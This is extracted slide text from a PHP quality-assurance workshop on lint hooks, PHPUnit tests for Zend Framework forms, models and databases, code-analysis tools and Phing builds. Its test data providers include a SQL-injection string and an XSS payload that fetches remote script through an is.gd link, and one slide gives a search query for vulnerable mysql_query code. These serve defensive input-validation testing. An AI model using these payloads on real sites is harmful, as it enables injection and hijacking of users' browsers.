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Quality Assurance
for PHP projects
PHPDublin, Dublin
Michelangelo van Dam
Thank you for having us
Schedule Workshop
Introduction to Quality Assurance
Revision control
Team works!
Introduction to QA
Why QA?
Why QA
Safeguarding code
Detect bugs early
Observe behavior
Prevent accidents from happening
Tracking progress
Why invest in QA?
Keeps your code in shape
Measures speed and performance
Boosts team spirit
Saves time
Reports continuously
Delivers ready to deploy packages
Quality Assurance Tools
Revision Control
Advantages of SCM
• team development possible
• tracking multi-versions of source code
• moving back and forth in history
• tagging of milestones
• backup of source code
• accessible from
- command line
- native apps
- IDE’s
- analytical tools
Syntax Checking
PHP Lint
• checks the syntax of code
• build in PHP core
• is used per file
- pre-commit hook for version control system
- batch processing of files
• can provide reports
- but if something fails -> the build fails
php -lf /path/to/filename.php
SVN Pre commit hook
# Pre-commit hook to validate syntax of incoming PHP files, if no failures it
# accepts the commit, otherwise it fails and blocks the commit
# modify these system executables to match your system
# PHP Syntax checking with PHP Lint
# originally from Joe Stump at Digg
for i in `$SVNLOOK changed -t "$TXN" "$REPOS" | $AWK '{print $2}'`
if [ ${i##*.} == php ]; then
CHECK=`$SVNLOOK cat -t "$TXN" "$REPOS" $i | $PHP -d html_errors=off -l || echo $i`
RETURN=`echo $CHECK | $GREP "^No syntax" > /dev/null && echo TRUE || echo FALSE`
if [ $RETURN = 'FALSE' ]; then
echo $CHECK 1>&2;
exit 1
Why documenting?
• new members in the team
• working with remote workers
• analyzing improvements
• think before doing
• used by IDE’s and editors for code hinting ;-)
phpDocumentor + DocBlox
March 16, 2012
unit testing 201:
start testing!
Any reasons not to test?
Most common excuses
• no time
• not within budget
• development team does not know how
• tests are provided after delivery
• …
No excuses!
• during development
- test will fail indicating bugs
• after sales support
- testing if an issue is genuine
- fixing issues won’t break code base
❖ if they do, you need to fix it!
• long term projects
- refactoring made easy
“Once a test is made, it will always be tested!”
Feel like on top of the world!
• for the developer
- code works
• for the manager
- project succeeds
• for sales / general management / share holders
- making profit
• for the customer
- paying for what they want
Everybody! likes this.
Don’t end up on this list!
extension:php mysql_query $_GET
Unit testing ZF apps
Setting things up
<phpunit bootstrap="./TestHelper.php" colors="true">
<testsuite name="Unit test suite">
<directory suffix=".php">../application/</directory>
<directory suffix=".php">../library/Mylib/</directory>
<directory suffix=".phtml">../application/</directory>
// set our app paths and environments
define('BASE_PATH', realpath(dirname(__FILE__) . '/../'));
define('APPLICATION_PATH', BASE_PATH . '/application');
define('TEST_PATH', BASE_PATH . '/tests');
define('APPLICATION_ENV', 'testing');
// Include path
. PATH_SEPARATOR . get_include_path()
// Set the default timezone !!!
// We wanna catch all errors en strict warnings
require_once 'Zend/Application.php';
$application = new Zend_Application(
APPLICATION_PATH . '/configs/application.ini'
Zend_Tool since 1.11.4
• provides
• phpunit.xml
• bootstrap.php
• IndexControllerTest.php
Ralph Schindler
Let’s get started…
Testing Zend_Form
E-mail Address:
Start with the test
class Application_Form_CommentFormTest extends PHPUnit_Framework_TestCase
protected $_form;
protected function setUp()
$this->_form = new Application_Form_CommentForm();
protected function tearDown()
$this->_form = null;
The good stuff
public function goodData()
return array (
array ('John Doe', '',
'', 'test comment'),
array ("Matthew Weier O'Phinney", '',
'', 'Doing an MWOP-Test'),
array ('D. Keith Casey, Jr.', '',
'', 'Doing a monkey dance'),
* @dataProvider goodData
public function testFormAcceptsValidData($name, $email, $web, $comment)
$data = array (
'name' => $name, 'mail' => $mail, 'web' => $web, 'comment' => $comment,
Little Bobby Tables
In the news…
Is this YOU?!?
The bad stuff
public function badData()
return array (
array ('','','',''),
array ("Robert'; DROP TABLES comments; --", '',
'','Little Bobby Tables'),
array (str_repeat('x', 100000), '', '', ''),
array ('John Doe', '',
'exploit twitter 9/21/2010'),
* @dataProvider badData
public function testFormRejectsBadData($name, $email, $web, $comment)
$data = array (
'name' => $name, 'mail' => $mail, 'web' => $web, 'comment' => $comment,
Create the form class
class Application_Form_CommentForm extends Zend_Form
public function init()
/* Form Elements & Other Definitions Here ... */
Let’s run the test
Let’s put in our elements
class Application_Form_CommentForm extends Zend_Form
public function init()
$this->addElement('text', 'name', array (
'Label' => 'Name', 'Required' => true));
$this->addElement('text', 'mail', array (
'Label' => 'E-mail Address', 'Required' => true));
$this->addElement('text', 'web', array (
'Label' => 'Website', 'Required' => false));
$this->addElement('textarea', 'comment', array (
'Label' => 'Comment', 'Required' => true));
$this->addElement('submit', 'post', array (
'Label' => 'Post', 'Ignore' => true));
Less errors?
Filter -Validate
$this->addElement('text', 'name', array (
'Label' => 'Name', 'Required' => true,
'Filters' => array ('StringTrim', 'StripTags'),
'Validators' => array (
new Zftest_Validate_Mwop(),
new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50))),
$this->addElement('text', 'mail', array (
'Label' => 'E-mail Address', 'Required' => true,
'Filters' => array ('StringTrim', 'StripTags', 'StringToLower'),
'Validators' => array (
new Zend_Validate_EmailAddress(),
new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50))),
$this->addElement('text', 'web', array (
'Label' => 'Website', 'Required' => false,
'Filters' => array ('StringTrim', 'StripTags', 'StringToLower'),
'Validators' => array (
new Zend_Validate_Callback(array('Zend_Uri', 'check')),
new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50))),
$this->addElement('textarea', 'comment', array (
'Label' => 'Comment', 'Required' => true,
'Filters' => array ('StringTrim', 'StripTags'),
'Validators' => array (
new Zftest_Validate_TextBox(),
new Zend_Validate_StringLength(array ('max' => 5000))),
Green, warm & fuzzy
You’re a winner!
☑ quality code
☑ tested
☑ secure
☑ reusable
Testing models
Testing business logic
• models contain logic
- tied to your business
- tied to your storage
- tied to your resources
• no “one size fits all” solution
Type: data containers
• contains structured data
- populated through setters and getters
• perform logic tied to it’s purpose
- transforming data
- filtering data
- validating data
• can convert into other data types
- arrays
- strings (JSON, serialized, xml, …)
• are providers to other models
Comment Class
Writing model test
class Application_Model_CommentTest extends PHPUnit_Framework_TestCase
protected $_comment;
protected function setUp()
$this->_comment = new Application_Model_Comment();
protected function tearDown()
$this->_comment = null;
public function testModelIsEmptyAtConstruct()
$this->assertSame(0, $this->_comment->getId());
This test won’t run!
Create a simple model
class Application_Model_Comment
protected $_id = 0; protected $_fullName; protected $_emailAddress;
protected $_website; protected $_comment;
public function setId($id) { $this->_id = (int) $id; return $this; }
public function getId() { return $this->_id; }
public function setFullName($fullName) { $this->_fullName = (string) $fullName; return $this; }
public function getFullName() { return $this->_fullName; }
public function setEmailAddress($emailAddress) { $this->_emailAddress = (string) $emailAddress; return $this; }
public function getEmailAddress() { return $this->_emailAddress; }
public function setWebsite($website) { $this->_website = (string) $website; return $this; }
public function getWebsite() { return $this->_website; }
public function setComment($comment) { $this->_comment = (string) $comment; return $this; }
public function getComment() { return $this->_comment; }
public function populate($row) {
if (is_array($row)) {
$row = new ArrayObject($row, ArrayObject::ARRAY_AS_PROPS);
if (isset ($row->id)) $this->setId($row->id);
if (isset ($row->fullName)) $this->setFullName($row->fullName);
if (isset ($row->emailAddress)) $this->setEmailAddress($row->emailAddress);
if (isset ($row->website)) $this->setWebsite($row->website);
if (isset ($row->comment)) $this->setComment($row->comment);
public function toArray() {
return array (
'id' => $this->getId(),
'fullName' => $this->getFullName(),
'emailAddress' => $this->getEmailAddress(),
'website' => $this->getWebsite(),
'comment' => $this->getComment(),
We pass the test…
Really ???
Not all data from user
• model can be populated from
- users through the form
- data stored in the database
- a webservice (hosted by us or others)
• simply test it
- by using same test scenario’s from our form
The good stuff
public function goodData()
return array (
array ('John Doe', '',
'', 'test comment'),
array ("Matthew Weier O'Phinney", '',
'', 'Doing an MWOP-Test'),
array ('D. Keith Casey, Jr.', '',
'', 'Doing a monkey dance'),
* @dataProvider goodData
public function testModelAcceptsValidData($name, $mail, $web, $comment)
$data = array (
'fullName' => $name, 'emailAddress' => $mail, 'website' => $web, 'comment' => $comment,
try {
} catch (Zend_Exception $e) {
$this->fail('Unexpected exception should not be triggered');
$data['id'] = 0;
$data['emailAddress'] = strtolower($data['emailAddress']);
$data['website'] = strtolower($data['website']);
$this->assertSame($this->_comment->toArray(), $data);
The bad stuff
public function badData()
return array (
array ('','','',''),
array ("Robert'; DROP TABLES comments; --", '', '','Little Bobby
array (str_repeat('x', 1000), '', '', ''),
array ('John Doe', '', ""style="font-size:999999999999px;
"onmouseover="$.getScript('http:u002fu002fis.gdu002ffl9A7')"/", 'exploit twitter
* @dataProvider badData
public function testModelRejectsBadData($name, $mail, $web, $comment)
$data = array (
'fullName' => $name, 'emailAddress' => $mail, 'website' => $web, 'comment' => $comment,
try {
} catch (Zend_Exception $e) {
$this->fail('Expected exception should be triggered');
Let’s run it
Modify our model
protected $_filters;
protected $_validators;
public function __construct($params = null)
$this->_filters = array (
'id' => array ('Int'),
'fullName' => array ('StringTrim', 'StripTags', new Zend_Filter_Alnum(true)),
'emailAddress' => array ('StringTrim', 'StripTags', 'StringToLower'),
'website' => array ('StringTrim', 'StripTags', 'StringToLower'),
'comment' => array ('StringTrim', 'StripTags'),
$this->_validators = array (
'id' => array ('Int'),
'fullName' => array (
new Zftest_Validate_Mwop(),
new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50)),
'emailAddress' => array (
new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50)),
'website' => array (
new Zend_Validate_Callback(array('Zend_Uri', 'check')),
new Zend_Validate_StringLength(array ('min' => 4, 'max' => 50)),
'comment' => array (
new Zftest_Validate_TextBox(),
new Zend_Validate_StringLength(array ('max' => 5000)),
if (null !== $params) { $this->populate($params); }
Modify setters: Id & name
public function setId($id)
$input = new Zend_Filter_Input($this->_filters, $this->_validators);
$input->setData(array ('id' => $id));
if (!$input->isValid('id')) {
throw new Zend_Exception('Invalid ID provided');
$this->_id = (int) $input->id;
return $this;
public function setFullName($fullName)
$input = new Zend_Filter_Input($this->_filters, $this->_validators);
$input->setData(array ('fullName' => $fullName));
if (!$input->isValid('fullName')) {
throw new Zend_Exception('Invalid fullName provided');
$this->_fullName = (string) $input->fullName;
return $this;
Email & website
public function setEmailAddress($emailAddress)
$input = new Zend_Filter_Input($this->_filters, $this->_validators);
$input->setData(array ('emailAddress' => $emailAddress));
if (!$input->isValid('emailAddress')) {
throw new Zend_Exception('Invalid emailAddress provided');
$this->_emailAddress = (string) $input->emailAddress;
return $this;
public function setWebsite($website)
$input = new Zend_Filter_Input($this->_filters, $this->_validators);
$input->setData(array ('website' => $website));
if (!$input->isValid('website')) {
throw new Zend_Exception('Invalid website provided');
$this->_website = (string) $input->website;
return $this;
and comment
public function setComment($comment)
$input = new Zend_Filter_Input($this->_filters, $this->_validators);
$input->setData(array ('comment' => $comment));
if (!$input->isValid('comment')) {
throw new Zend_Exception('Invalid comment provided');
$this->_comment = (string) $input->comment;
return $this;
Now we’re good!
Testing Databases
Integration Testing
• database specific functionality
- triggers
- constraints
- stored procedures
- sharding/scalability
• data input/output
- correct encoding of data
- transactions execution and rollback
Points of concern
• beware of automated data types
- auto increment sequence ID’s
- default values like CURRENT_TIMESTAMP
• beware of time related issues
- timestamp vs. datetime
- UTC vs. local time
The domain Model
• Model object
• Mapper object
• Table gateway object
Read more about it ☞
Change our test class
class Application_Model_CommentTest
extends PHPUnit_Framework_TestCase
class Application_Model_CommentTest
extends Zend_Test_PHPUnit_DatabaseTestCase
Setting DB Testing up
protected $_connectionMock;
public function getConnection()
if (null === $this->_dbMock) {
$this->bootstrap = new Zend_Application(
APPLICATION_ENV, APPLICATION_PATH . '/configs/application.ini');
$db = $this->bootstrap->getBootstrap()->getResource('db');
$this->_connectionMock = $this->createZendDbConnection(
$db, 'zftest'
return $this->_connectionMock;
public function getDataSet()
return $this->createFlatXmlDataSet(
realpath(APPLICATION_PATH . '/../tests/_files/initialDataSet.xml'));
<?xml version="1.0" encoding="UTF-8"?>
fullName="B.A. Baracus"
comment="I pitty the fool that doesn't test!"/>
fullName="Martin Fowler"
comment="Models are not right or wrong; they are more or less useful."/>
Testing SELECT
public function testDatabaseCanBeRead()
$ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet(
$ds->addTable('comment', 'SELECT * FROM `comment`');
$expected = $this->createFlatXMLDataSet(
APPLICATION_PATH . '/../tests/_files/selectDataSet.xml');
$this->assertDataSetsEqual($expected, $ds);
<?xml version="1.0" encoding="UTF-8"?>
fullName="B.A. Baracus"
comment="I pitty the fool that doesn't test!"/>
fullName="Martin Fowler"
comment="Models are not right or wrong; they are more or less useful."/>
Testing UPDATE
public function testDatabaseCanBeUpdated()
$comment = new Application_Model_Comment();
$mapper = new Application_Model_CommentMapper();
$mapper->find(1, $comment);
$comment->setComment('I like you picking up the challenge!');
$ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet(
$ds->addTable('comment', 'SELECT * FROM `comment`');
$expected = $this->createFlatXMLDataSet(
APPLICATION_PATH . '/../tests/_files/updateDataSet.xml');
$this->assertDataSetsEqual($expected, $ds);
<?xml version="1.0" encoding="UTF-8"?>
fullName="B.A. Baracus"
comment="I like you picking up the challenge!"/>
fullName="Martin Fowler"
comment="Models are not right or wrong; they are more or less useful."/>
Testing DELETE
public function testDatabaseCanDeleteAComment()
$comment = new Application_Model_Comment();
$mapper = new Application_Model_CommentMapper();
$mapper->find(1, $comment)
$ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet(
$ds->addTable('comment', 'SELECT * FROM `comment`');
$expected = $this->createFlatXMLDataSet(
APPLICATION_PATH . '/../tests/_files/deleteDataSet.xml');
$this->assertDataSetsEqual($expected, $ds);
<?xml version="1.0" encoding="UTF-8"?>
fullName="Martin Fowler"
comment="Models are not right or wrong; they are more or less useful."/>
Testing INSERT
public function testDatabaseCanAddAComment()
$comment = new Application_Model_Comment();
$comment->setFullName('Michelangelo van Dam')
->setComment('Unit Testing, It is so addictive!!!');
$mapper = new Application_Model_CommentMapper();
$ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet(
$ds->addTable('comment', 'SELECT * FROM `comment`');
$expected = $this->createFlatXMLDataSet(
APPLICATION_PATH . '/../tests/_files/addDataSet.xml');
$this->assertDataSetsEqual($expected, $ds);
<?xml version="1.0" encoding="UTF-8"?>
fullName="B.A. Baracus"
comment="I pitty the fool that doesn't test!"/>
fullName="Martin Fowler"
comment="Models are not right or wrong; they are more or less useful."/>
fullName="Michelangelo van Dam"
comment="Unit Testing, It is so addictive!!!"/>
Run Test
What went wrong here?
Testing INSERT w/ filter
public function testDatabaseCanAddAComment()
$comment = new Application_Model_Comment();
$comment->setFullName('Michelangelo van Dam')
->setComment('Unit Testing, It is so addictive!!!');
$mapper = new Application_Model_CommentMapper();
$ds = new Zend_Test_PHPUnit_Db_DataSet_QueryDataSet(
$ds->addTable('comment', 'SELECT * FROM `comment`');
$filteredDs = new PHPUnit_Extensions_Database_DataSet_DataSetFilter(
$ds, array ('comment' => array ('id')));
$expected = $this->createFlatXMLDataSet(
APPLICATION_PATH . '/../tests/_files/addDataSet.xml');
$this->assertDataSetsEqual($expected, $filteredDs);
<?xml version="1.0" encoding="UTF-8"?>
fullName="B.A. Baracus"
comment="I pitty the fool that doesn't test!"/>
fullName="Martin Fowler"
comment="Models are not right or wrong; they are more or less useful."/>
fullName="Michelangelo van Dam"
comment="Unit Testing, It is so addictive!!!"/>
Run Test
Testing web services
Web services remarks
• you need to comply with an API
- that will be your reference
• you cannot always make a test-call
- paid services per call
- test environment is “offline”
- network related issues
class Zftest_Service_JoindinTest extends PHPUnit_Framework_TestCase
protected $_joindin;
protected $_settings;
protected function setUp()
$this->_joindin = new Zftest_Service_Joindin();
$settings = simplexml_load_file(realpath(
APPLICATION_PATH . '/../tests/_files/settings.xml'));
$this->_settings = $settings->joindin;
protected function tearDown()
$this->_joindin = null;
public function testJoindinCanGetUserDetails()
$expected = '<?xml version="1.0"?><response><item><username>DragonBe</
username><full_name>Michelangelo van Dam</full_name><ID>19</
$actual = $this->_joindin->user()->getDetail();
$this->assertXmlStringEqualsXmlString($expected, $actual);
public function testJoindinCanCheckStatus()
$date = new DateTime();
$date->setTimezone(new DateTimeZone('UTC'));
$expected = '<?xml version="1.0"?><response><dt>' . $date->format('r') .
'</dt><test_string>testing unit test</test_string></response>';
$actual = $this->_joindin->site()->getStatus('testing unit test');
$this->assertXmlStringEqualsXmlString($expected, $actual);
Testing the service
Euh… what?
1) Zftest_Service_JoindinTest::testJoindinCanGetUserDetails
Failed asserting that two strings are equal.
--- Expected
+++ Actual
@@ @@
- <last_login>1303248639</last_login>
+ <last_login>1303250271</last_login>
I recently logged in ✔
And this?
2) Zftest_Service_JoindinTest::testJoindinCanCheckStatus
Failed asserting that two strings are equal.
--- Expected
+++ Actual
@@ @@
<?xml version="1.0"?>
- <dt>Tue, 19 Apr 2011 22:26:40 +0000</dt>
+ <dt>Tue, 19 Apr 2011 22:26:41 +0000</dt>
<test_string>testing unit test</test_string>
Latency of the network 1s !
Solution… right here!
Your expectations
class Zftest_Service_JoindinTest extends PHPUnit_Framework_TestCase
protected $_joindin;
protected $_settings;
protected function setUp()
$this->_joindin = new Zftest_Service_Joindin();
$client = new Zend_Http_Client();
$client->setAdapter(new Zend_Http_Client_Adapter_Test());
$settings = simplexml_load_file(realpath(
APPLICATION_PATH . '/../tests/_files/settings.xml'));
$this->_settings = $settings->joindin;
protected function tearDown()
$this->_joindin = null;
public function testJoindinCanGetUserDetails()
$response = <<<EOS
HTTP/1.1 200 OK
Content-type: text/xml
<?xml version="1.0"?>
<full_name>Michelangelo van Dam</full_name>
$client = $this->_joindin->getClient()->getAdapter()->setResponse($response);
$expected = '<?xml version="1.0"?><response><item><username>DragonBe</
username><full_name>Michelangelo van Dam</full_name><ID>19</ID><last_login>1303248639</
$actual = $this->_joindin->user()->getDetail();
$this->assertXmlStringEqualsXmlString($expected, $actual);
public function testJoindinCanCheckStatus()
$date = new DateTime();
$date->setTimezone(new DateTimeZone('UTC'));
$response = <<<EOS
HTTP/1.1 200 OK
Content-type: text/xml
<?xml version="1.0"?>
<test_string>testing unit test</test_string>
$client = $this->_joindin->getClient()
$expected = '<?xml version="1.0"?><response><dt>' . $date->format('r') .
'</dt><test_string>testing unit test</test_string></response>';
$actual = $this->_joindin->site()->getStatus('testing unit test');
$this->assertXmlStringEqualsXmlString($expected, $actual);
Good implementation?
Controller Testing
Our form flow
Setting up ControllerTest
class IndexControllerTest extends Zend_Test_PHPUnit_ControllerTestCase
public function setUp()
$this->bootstrap = new Zend_Application(
APPLICATION_ENV, APPLICATION_PATH . '/configs/application.ini');
Testing if form is on page
public function testIndexAction()
$params = array(
'action' => 'index',
'controller' => 'index',
'module' => 'default'
$url = $this->url($this->urlizeOptions($params));
// assertions
'h1#pageTitle', 'Please leave a comment');
$this->assertQueryCount('form#commentForm', 1);
Test processing
public function testProcessAction()
$testData = array (
'name' => 'testUser',
'mail' => '',
'web' => '',
'comment' => 'This is a test comment',
$params = array('action' => 'process', 'controller' => 'index', 'module' => 'default');
$url = $this->url($this->urlizeOptions($params));
// assertions
$this->assertQueryContentContains('span#fullName', $testData['name']);
• data providers can be used
- to test valid data
- to test invalid data
• but we know it’s taken care of our model
- just checking for error messages in form
Test if we hit home
public function testSuccessAction()
$params = array(
'action' => 'success',
'controller' => 'index',
'module' => 'default'
$url = $this->url($this->urlizeOptions($params));
// assertions
Running the tests
Testing it all
Testing it all
Our progress report
• unit testing is simple
• combine integration tests with unit tests
• test what counts
• mock out what’s remote
Fork this code
Code Analysis
• how stable is my code?
• how flexible is my code?
• how complex is my code?
• how easy can I refactor my code?
• PHPDepend - Dependency calculations
• PHPMD - Mess detections and code “smells”
• PHPCPD - Copy/paste detection
• PHPCS - PHP_CodeSniffer
PHP Depend
• generates metrics
• measure health
• identify parts to improve (refactor)
pdepend pyramid
• CYCLO: Cyclomatic Complexity
• LOC: Lines of Code
• NOM: Number of Methods
• NOC: Number of Classes
• NOP: Number of Packages
• AHH:Average Hierarchy Height
• ANDC:Average Number of Derived Classes
• FANOUT: Number of Called Classes
• CALLS: Number of Operation Calls
Cyclomatic Complexity
• metric calculation
• execution paths
• independent control structures
- if, else, for, foreach, switch case, while, do, …
• within a single method or function
• more info
Average Hierarchy Height
The average of the maximum length from a root class
to its deepest subclass
pdepend pyramid
few classes derived from other classes
lots of classes inherit from other classes
pdepend pyramid
Size and complexity
pdepend pyramid
pdepend pyramid
High value
PHP Mess Detection
• detects code smells
- possible bugs
- sub-optimal code
- over complicated expressions
- unused parameters, methods and properties
- wrongly named parameters, methods or properties
PHP Copy/Paste
• detects similar code snippets
- plain copy/paste work
- similar code routines
• indicates problems
- maintenance hell
- downward spiral of disasters
• stimulates improvements
- refactoring of code
- moving similar code snippets in common routines
PHP CodeSniffer
Required evil
• validates coding standards
- consistency
- readability
• set as a policy for development
• reports failures to meet the standard
- sometimes good: parentheses on wrong line
- mostly bad: line exceeds 80 characters
❖ but needed for terminal viewing of code
• can be set as pre-commit hook
- but can cause frustration!!!
Performance Analysis!/andriesss/status/189712045766225920
Key reason
“computers are great at doing repetitive tasks very well”
• syntax checking
• documenting
• testing
• measuring
Why Phing?
• php based (it’s already on our system)
• open-source
• supported by many tools
• very simple syntax
• great documentation
Structure of a build
<?xml version="1.0" encoding="UTF-8"?>
<project name="Application build" default="phplint">
<!-- set global and local properties -->
<property file="" />
<property file="" override="true" />
<!-- define our code base files -->
<fileset dir="${project.basedir}" id="phpfiles">
<include name="application/**/*.php" />
<include name="library/In2it/**/*.php" />
<!-- let’s validate the syntax of our code base -->
<target name="phplint" description="Validating PHP Syntax">
<phplint haltonfailure="true">
<fileset refid="phpfiles" />
<?xml version="1.0" encoding="UTF-8"?>
<project name="Application build" default="phplint">
<!-- set global and local properties -->
<property file=""/>
<property file="" override="true" />
<!-- define our code base files -->
<fileset dir="${project.basedir}" id="phpfiles">
<include name="application/**/*.php" />
<include name="library/In2it/**/*.php" />
<!-- let’s validate the syntax of our code base -->
<target name="phplint" description="Validating PHP Syntax">
<phplint haltonfailure="true">
<fileset refid="phpfiles" />
Structure of a build
<project name="Application build" default="phplint">
<?xml version="1.0" encoding="UTF-8"?>
<project name="Application build" default="phplint">
<!-- set global and local properties -->
<property file=""/>
<property file="" override="true" />
<!-- define our code base files -->
<fileset dir="${project.basedir}" id="phpfiles">
<include name="application/**/*.php" />
<include name="library/In2it/**/*.php" />
<!-- let’s validate the syntax of our code base -->
<target name="phplint" description="Validating PHP Syntax">
<phplint haltonfailure="true">
<fileset refid="phpfiles" />
Structure of a build
<!-- set global and local properties -->
<property file="" />
<property file="" override="true" />
<?xml version="1.0" encoding="UTF-8"?>
<project name="Application build" default="phplint">
<!-- set global and local properties -->
<property file=""/>
<property file="" override="true" />
<!-- define our code base files -->
<fileset dir="${project.basedir}" id="phpfiles">
<include name="application/**/*.php" />
<include name="library/In2it/**/*.php" />
<!-- let’s validate the syntax of our code base -->
<target name="phplint" description="Validating PHP Syntax">
<phplint haltonfailure="true">
<fileset refid="phpfiles" />
Structure of a build
<!-- define our code base files -->
<fileset dir="${project.basedir}" id="phpfiles">
<include name="application/**/*.php" />
<include name="library/In2it/**/*.php" />
<?xml version="1.0" encoding="UTF-8"?>
<project name="Application build" default="phplint">
<!-- set global and local properties -->
<property file=""/>
<property file="" override="true" />
<!-- define our code base files -->
<fileset dir="${project.basedir}" id="phpfiles">
<include name="application/**/*.php" />
<include name="library/In2it/**/*.php" />
<!-- let’s validate the syntax of our code base -->
<target name="phplint" description="Validating PHP Syntax">
<phplint haltonfailure="true">
<fileset refid="phpfiles" />
Structure of a build
<!-- let’s validate the syntax of our code base -->
<target name="phplint" description="Validating PHP Syntax">
<phplint haltonfailure="true">
<fileset refid="phpfiles" />
<?xml version="1.0" encoding="UTF-8"?>
<project name="Application build" default="phplint">
<!-- set global and local properties -->
<property file=""/>
<property file="" override="true" />
<!-- define our code base files -->
<fileset dir="${project.basedir}" id="phpfiles">
<include name="application/**/*.php" />
<include name="library/In2it/**/*.php" />
<!-- let’s validate the syntax of our code base -->
<target name="phplint" description="Validating PHP Syntax">
<phplint haltonfailure="true">
<fileset refid="phpfiles" />
Structure of a build
phpbook:qademo dragonbe$ cat
# General settings
# AB Testing properties
• some tools provide output we can use later
• called “artifacts”
• we need to store them somewhere
• so we create a prepare target
• that creates these artifact directories (./build)
• that gets cleaned every run
Prepare for artifacts
<target name="prepare" description="Clean up the build path">
<delete dir="${project.basedir}/build" quiet="true" />
<mkdir dir="${project.basedir}/build" />
<mkdir dir="${project.basedir}/build/docs" />
<mkdir dir="${project.basedir}/build/logs" />
<mkdir dir="${project.basedir}/build/coverage" />
<mkdir dir="${project.basedir}/build/pdepend" />
<mkdir dir="${project.basedir}/build/browser" />
<target name="phpdoc2" description="Generating automated documentation">
<property name="doc.title" value="${project.title} API Documentation"/>
-d application/,library/In2it
-e php -t ${project.basedir}/build/docs
passthru="true" />
<target name="phpunit" description="Running unit tests">
--coverage-html ${project.basedir}/build/coverage
--coverage-clover ${project.basedir}/build/logs/clover.xml
--log-junit ${project.basedir}/build/logs/junit.xml"
passthru="true" />
<target name="phpcs" description="Validate code with PHP CodeSniffer">
--extensions=php application library/In2it"
passthru="true" />
Copy Paste Detection
<target name="phpcpd" description="Detect copy/paste with PHPCPD">
<fileset refid="phpfiles" />
outfile="${project.basedir}/build/logs/pmd-cpd.xml" />
PHP Mess Detection
<target name="phpmd" description="Mess detection with PHPMD">
<fileset refid="phpfiles" />
outfile="${project.basedir}/build/logs/pmd.xml" />
PHP Depend
<target name="pdepend" description="Dependency calculations with PDepend">
<fileset refid="phpfiles" />
outfile="${project.basedir}/build/logs/jdepend.xml" />
outfile="${project.basedir}/build/logs/phpunit.xml" />
outfile="${project.basedir}/build/logs/pdepend-summary.xml" />
outfile="${project.basedir}/build/pdepend/pdepend.svg" />
outfile="${project.basedir}/build/pdepend/pyramid.svg" />
PHP CodeBrowser
<target name="phpcb" description="Code browser with PHP_CodeBrowser">
-l ${project.basedir}/build/logs
-S php
-o ${project.basedir}/build/browser"
Create a build procedure
<target name="build" description="Building app">
<phingCall target="prepare" />
<phingCall target="phplint" />
<phingCall target="phpunit" />
<phingCall target="phpdoc2" />
<phingCall target="phpcs" />
<phingCall target="phpcpd" />
<phingCall target="phpmd" />
<phingCall target="pdepend" />
<phingCall target="phpcb" />
Other things to automate
• server stress-testing with Apache Benchmark
• database deployment with DBDeploy
• package code base with Phar
• transfer package to servers with
- scp/rsync
• execute remote commands with SSH
• … so much more
Example DBDeploy
<target name="dbdeploy" description="Update the DB to the latest version">
<!-- set the path for mysql execution scripts -->
value="${project.basedir}/${dbdeploy.scripts}" />
<!-- process the DB deltas -->
<!-- execute deltas -->
Continuous Integration
Now you are a winner!
Team Works!
Get your information
in a consistent, automated way
and make it accessible for the team
More people can better safeguard the code!
(just click on the links)
• OOD	
-­‐ Robert	
January 25 - 26, 2014
Michelangelo van Dam
I’d like to thank the following people for sharing their creative commons pictures
team spirit:
continuous reporting:
deploy packages:
chris hartjes:
mount everest:
everybody likes this:
race cars:
protection dog:
1st place:
Thank you

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Workshop quality assurance for php projects - phpdublin

  • 1. Quality Assurance for PHP projects PHPDublin, Dublin Ireland
  • 3. Thank you for having us
  • 4. Schedule Workshop Introduction to Quality Assurance Revision control Documenting Testing Measuring Automating Team works!
  • 14. Keeps your code in shape
  • 15. Measures speed and performance
  • 19. Delivers ready to deploy packages
  • 23. GIT
  • 28. Advantages of SCM • team development possible • tracking multi-versions of source code • moving back and forth in history • tagging of milestones • backup of source code • accessible from - command line - native apps - IDE’s - analytical tools TIP:  hooks  for  tools
  • 31. PHP Lint • checks the syntax of code • build in PHP core • is used per file - pre-commit hook for version control system - batch processing of files • can provide reports - but if something fails -> the build fails TIP:  pre-­‐commit  hook
  • 33. PHP  Lint  on  Command  Line
  • 34. SVN Pre commit hook #!/bin/sh # # Pre-commit hook to validate syntax of incoming PHP files, if no failures it # accepts the commit, otherwise it fails and blocks the commit REPOS="$1" TXN="$2" # modify these system executables to match your system PHP=/usr/bin/php AWK=/usr/bin/awk GREP=/bin/grep SVNLOOK=/usr/bin/svnlook # PHP Syntax checking with PHP Lint # originally from Joe Stump at Digg # # for i in `$SVNLOOK changed -t "$TXN" "$REPOS" | $AWK '{print $2}'` do if [ ${i##*.} == php ]; then CHECK=`$SVNLOOK cat -t "$TXN" "$REPOS" $i | $PHP -d html_errors=off -l || echo $i` RETURN=`echo $CHECK | $GREP "^No syntax" > /dev/null && echo TRUE || echo FALSE` if [ $RETURN = 'FALSE' ]; then echo $CHECK 1>&2; exit 1 fi fi done
  • 37. Why documenting? • new members in the team • working with remote workers • analyzing improvements • think before doing • used by IDE’s and editors for code hinting ;-)
  • 41. Based  on  docblocks  in  code
  • 44. Phpdoc2  on  your  project
  • 47. Any reasons not to test?
  • 48. Most common excuses • no time • not within budget • development team does not know how • tests are provided after delivery • …
  • 50. Maintainability • during development - test will fail indicating bugs • after sales support - testing if an issue is genuine - fixing issues won’t break code base ❖ if they do, you need to fix it! • long term projects - refactoring made easy
  • 51. Remember “Once a test is made, it will always be tested!”
  • 52. Feel like on top of the world!
  • 53. Confidence • for the developer - code works • for the manager - project succeeds • for sales / general management / share holders - making profit • for the customer - paying for what they want
  • 55. Don’t end up on this list! extension:php mysql_query $_GET
  • 58. phpunit.xml <phpunit bootstrap="./TestHelper.php" colors="true"> <testsuite name="Unit test suite"> <directory>./</directory> </testsuite> <filter> <whitelist> <directory suffix=".php">../application/</directory> <directory suffix=".php">../library/Mylib/</directory> <exclude> <directory suffix=".phtml">../application/</directory> </exclude> </whitelist> </filter> </phpunit>
